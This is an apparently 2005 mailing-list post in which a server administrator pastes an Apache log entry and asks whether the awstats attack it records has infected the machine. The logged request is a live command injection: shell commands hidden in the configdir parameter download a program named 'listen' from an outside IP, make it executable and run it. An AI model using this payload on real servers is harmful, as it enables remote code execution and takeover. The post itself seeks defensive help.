Hugo Vanwoerkom wrote: > Mike McCarty wrote: > >> http://www.securityfocus.com/brief/38?ref=rss >> >> > > How to detect whether infection has occurred? > > H > >
I got the following log in my apache access.log which I'm concerned about: 208.234.0.44 - - [08/Nov/2005:10:01:03 -0500] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 200 780 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" This was the only log which gave the client a 200 reply. I didn't find anything on my /tmp and nothing was listening to the UDP ports 7111 or 7222. My awstats version is 6.4-2 which people say should be patched up to be unvulnerable to this attack. How do I make sure that my machine is not infected and serving someone else now? Thanks, /KS -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
